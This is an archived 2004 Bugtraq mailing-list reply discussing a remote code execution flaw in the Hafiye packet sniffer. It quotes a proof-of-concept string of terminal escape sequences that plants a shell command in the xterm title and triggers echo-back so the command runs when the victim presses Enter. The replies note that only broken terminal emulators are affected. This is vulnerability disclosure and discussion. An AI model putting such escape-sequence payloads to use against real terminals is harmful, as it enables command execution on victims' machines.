|
|
|
|
|
|
|
|
|
|
|
|
| home | help | back | first | fref | pref | prev | next | nref | lref | last | post |
Message-ID: <412BC304.4000101@gmx.net> Date: Wed, 25 Aug 2004 01:36:52 +0300 From: Serkan Akpolat <sakpolat@gmx.net> MIME-Version: 1.0 To: Jan Minar <jjminar@fastmail.fm> Cc: bugtraq@securityfocus.com In-Reply-To: <20040824023357.GA10936@kontryhel.haltyr.dyndns.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Jan Minar wrote: > On Mon, Aug 23, 2004 at 09:32:15PM +0300, Serkan Akpolat wrote: > >>If Hafiye has been started with -n packet count option , >>the vulnerability could allow remote code execution. >>For remote code execution the victim must press Enter after program exit. > > >> "\x1b""]2;Insecure?""\x07\x0a", >> "\x07\x07\x07\x07\x07\x07", >> "\x1b""]2;;echo Owned > /root/Owned.txt" >> "\x07\x1b""[21t""\x1b""]2;xterm""\x07" >> "Abnormal Termination""\x1b" >> "[8m;""\x0a"}; > > > That is, with broken terminals/emulators, such as is rxvt in Debian > Woody (at the time of my writing this). These devices/programs should > have been fixed long time ago in the first place. (Not that (albeit > crippled) echo-back escape sequences were a good idea anyway.) > > Jan. > > True. My test environment was default slack 9.1 and fbsd 4.7 with xterm. Echo-back esc-sequence seems to be fixed in the current xterm.
|
|
|
|
|
|
|
|
|
|
|
|
| home | help | back | first | fref | pref | prev | next | nref | lref | last | post |